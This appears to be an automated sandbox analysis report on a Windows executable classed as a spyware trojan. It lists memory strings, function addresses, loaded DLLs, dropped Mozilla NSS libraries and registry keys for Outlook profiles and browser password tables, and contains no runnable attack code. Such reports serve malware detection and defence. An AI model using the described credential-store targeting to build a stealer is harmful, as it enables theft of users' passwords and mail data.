Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2294260699.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: AKFIDHDG.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: AKFIDHDG.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AKFIDHDG.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: EGCFIDAFBFBAKFHJEGIJ.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr String found in binary or memory: https://support.mozilla.org
Source: AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.dr String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: AKFIDHDG.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2213778910.000000002FC51000.00000004.00000020.00020000.00000000.sdmp, AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2213778910.000000002FC51000.00000004.00000020.00020000.00000000.sdmp, AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2213778910.000000002FC51000.00000004.00000020.00020000.00000000.sdmp, AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C6DB700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DB8C0 rand_s,NtQueryVirtualMemory, 0_2_6C6DB8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C6DB910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C67F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C67F280
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040384C 0_2_0040384C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004EB833 0_2_004EB833
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004EA8EA 0_2_004EA8EA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004418F4 0_2_004418F4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00536123 0_2_00536123
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005309EF 0_2_005309EF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0053F989 0_2_0053F989
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0053A9B4 0_2_0053A9B4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006522E0 0_2_006522E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0053C3FA 0_2_0053C3FA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0048A3F4 0_2_0048A3F4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004F34D2 0_2_004F34D2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00537D08 0_2_00537D08
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0053DF10 0_2_0053DF10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004A6F23 0_2_004A6F23
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0044B72B 0_2_0044B72B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00533F23 0_2_00533F23
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00477FCB 0_2_00477FCB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6735A0 0_2_6C6735A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C685440 0_2_6C685440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E545C 0_2_6C6E545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E542B 0_2_6C6E542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6EAC00 0_2_6C6EAC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6B5C10 0_2_6C6B5C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6C2C10 0_2_6C6C2C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C67D4E0 0_2_6C67D4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6B6CF0 0_2_6C6B6CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6864C0 0_2_6C6864C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C69D4D0 0_2_6C69D4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D34A0 0_2_6C6D34A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DC4A0 0_2_6C6DC4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C686C80 0_2_6C686C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68FD00 0_2_6C68FD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6A0512 0_2_6C6A0512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C69ED10 0_2_6C69ED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D85F0 0_2_6C6D85F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6B0DD0 0_2_6C6B0DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E6E63 0_2_6C6E6E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C67C670 0_2_6C67C670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6C2E4E 0_2_6C6C2E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C694640 0_2_6C694640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C699E50 0_2_6C699E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6B3E50 0_2_6C6B3E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D9E30 0_2_6C6D9E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6C5600 0_2_6C6C5600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6B7E10 0_2_6C6B7E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E76E3 0_2_6C6E76E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C67BEF0 0_2_6C67BEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68FEF0 0_2_6C68FEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D4EA0 0_2_6C6D4EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DE680 0_2_6C6DE680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C695E90 0_2_6C695E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C689F00 0_2_6C689F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6B7710 0_2_6C6B7710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C67DFE0 0_2_6C67DFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6A6FF0 0_2_6C6A6FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6C77A0 0_2_6C6C77A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6BF070 0_2_6C6BF070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C698850 0_2_6C698850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C69D850 0_2_6C69D850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6BB820 0_2_6C6BB820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6C4820 0_2_6C6C4820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C687810 0_2_6C687810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C69C0E0 0_2_6C69C0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6B58E0 0_2_6C6B58E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E50C7 0_2_6C6E50C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6A60A0 0_2_6C6A60A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68D960 0_2_6C68D960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6CB970 0_2_6C6CB970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6EB170 0_2_6C6EB170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C69A940 0_2_6C69A940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C67C9A0 0_2_6C67C9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6AD9B0 0_2_6C6AD9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6B5190 0_2_6C6B5190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D2990 0_2_6C6D2990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6B9A60 0_2_6C6B9A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C691AF0 0_2_6C691AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6BE2F0 0_2_6C6BE2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6B8AC0 0_2_6C6B8AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6722A0 0_2_6C6722A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6A4AA0 0_2_6C6A4AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68CAB0 0_2_6C68CAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E2AB0 0_2_6C6E2AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6EBA90 0_2_6C6EBA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68C370 0_2_6C68C370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C675340 0_2_6C675340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6BD320 0_2_6C6BD320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E53C8 0_2_6C6E53C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C67F380 0_2_6C67F380
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C6B94D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C6ACBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00184610 appears 316 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2294654696.000000006C8F5000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: trzlrlhz ZLIB complexity 0.9949077347285068
Source: file.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C6D7030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001990A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_001990A0
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\K5QO88QS.htm Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2129376335.000000001D788000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144202039.000000001D77B000.00000004.00000020.00020000.00000000.sdmp, IJECBGIJDGCAEBFIIECA.0.dr, FCAAEHJDBKJJKFHJEBKF.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe ReversingLabs: Detection: 36%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 1793024 > 1048576
Source: file.exe Static PE information: Raw size of trzlrlhz is bigger than: 0x100000 < 0x19e600
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
